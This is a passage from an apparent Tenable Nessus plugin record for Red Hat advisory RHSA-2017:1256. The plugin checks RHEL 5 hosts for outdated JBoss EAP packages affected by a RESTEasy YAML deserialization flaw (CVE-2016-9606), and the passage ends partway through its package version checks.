"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77", "p-cpe:/a:redhat:enterprise_linux:jboss-as-logging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-mail", "p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content", "p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster", "p-cpe:/a:redhat:enterprise_linux:jboss-as-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-as-network", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service", "p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink", "p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean", "p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol", "p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-as-sar", "p-cpe:/a:redhat:enterprise_linux:jboss-as-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-server", "p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-threads", "p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-as-version", "p-cpe:/a:redhat:enterprise_linux:jboss-as-web", "p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices", "p-cpe:/a:redhat:enterprise_linux:jboss-as-weld", "p-cpe:/a:redhat:enterprise_linux:jboss-as-xts", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base", "p-cpe:/a:redhat:enterprise_linux:jbossas-appclient", "p-cpe:/a:redhat:enterprise_linux:jbossas-bundles", "p-cpe:/a:redhat:enterprise_linux:jbossas-core", "p-cpe:/a:redhat:enterprise_linux:jbossas-domain", "p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs", "p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-standalone", "p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:picketbox", "p-cpe:/a:redhat:enterprise_linux:picketlink-bindings", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:resteasy", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2017-1256.NASL", "href": "https://www.tenable.com/plugins/nessus/100316", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1256. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100316);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-9606\");\n script_xref(name:\"RHSA\", value:\"2017:1256\");\n\n script_name(english:\"RHEL 5 : JBoss EAP (RHSA-2017:1256)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 6.4 for RHEL 5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 6.4.14, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be\nforced to parse a request with YamlProvider, resulting in\nunmarshalling of potentially untrusted data. An attacker could\npossibly use this flaw execute arbitrary code with the permissions of\nthe application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for\nreporting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-US/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9606\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-connector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-sar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-threads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-weld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-xts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-standalone\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1256\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-core-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-entitymanager-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-envers-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-infinispan-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hornetq-2.3.25-20.SP18_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpserver-1.0.8-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-common-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-common-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-common-spi-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-core-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-core-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-deployers-common-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-jdbc-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-spec-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-validator-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-appclient-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-cli-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-client-all-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-clustering-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-cmp-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-configadmin-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-connector-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-controller-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-controller-client-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-core-security-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-deployment-repository-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-deployment-scanner-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-domain-http-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-domain-management-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-ee-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-ee-deployment-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-ejb3-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-embedded-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-host-controller-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-jacorb-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-jaxr-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-jaxrs-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-jdr-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-jmx-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-jpa-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-jsf-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-jsr77-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-logging-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-mail-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-management-client-content-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-messaging-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-modcluster-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-naming-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-network-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-osgi-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-osgi-configadmin-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-osgi-service-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-picketlink-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-platform-mbean-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-pojo-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-process-controller-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-protocol-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-remoting-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-sar-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-security-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-server-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-system-jmx-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-threads-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-transactions-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-version-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-web-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-webservices-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-weld-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-xts-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-ejb-client-1.0.39-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-security-negotiation-2.3.13-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-xnio-base-3.0.16-1.GA_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-appclient-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-bundles-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-core-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-domain-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-javadocs-7.5.15-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-modules-eap-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-product-eap-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 